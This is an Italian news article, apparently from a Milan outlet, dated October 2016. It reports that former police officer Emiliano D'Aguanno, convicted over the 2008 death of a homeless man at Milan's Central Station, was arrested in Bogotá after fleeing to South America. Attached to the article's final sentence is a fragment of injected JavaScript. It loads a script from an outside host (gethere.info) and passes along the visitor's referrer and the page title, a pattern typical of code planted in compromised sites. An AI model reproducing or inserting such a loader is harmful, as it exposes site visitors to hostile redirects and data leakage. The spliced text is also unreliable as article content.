"/>
giovedì 17 agosto 2017 17:43:34
omnimilano

Condannato per omicidio preterintenzionale era fuggito in Colombia: arrestato ex poliziotto

8 ottobre 2016 Cronaca

Finita due giorni fa la latitanza dell’ex poliziotto 35enne Emiliano D’Aguanno che nel 2008 assieme al collega 34enne Domenico Romitaggio aveva causato la morte di un clochard, Giuseppe Torrisi, allora 58enne, il 7 settembre in Stazione Centrale. La squadra mobile con la collaborazione dell’Interpol, ha individuato e bloccato l’uomo aspettandolo ad una partita di calcio a Bogotà, in Colombia, dove era fuggito facendo perdere le proprie tracce. I due agenti durante un controllo avevano ferito a morte il clochard sostenendo di essere stati aggrediti dalla vittima con un coltellino. Condannati per omicidio preterintenzionale e per falso ideologico, i due agenti hanno visto diventare la sentenza definitiva nel 2014. Il 34enne si era costituito, D’Aguanno era invece fuggito in Argentina e, una volta atterrato a Buenos Aires, aveva raggiunto prima l’Ecuador e poi la Colombia. Giocava in una squadra di calcio locale universitaria, il Cun, e si manteneva facendo lezioni di italiano in attesa di aprire una agenzia di viaggi. Non aveva famiglia. Il 35enne non ha opposto resistenza al momento dell’arresto, ora è in carcere in Colombia mentre sono state avviate le pratiche per l’estradizione. L’uomo aveva contatti sporadici con i parenti italiani.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo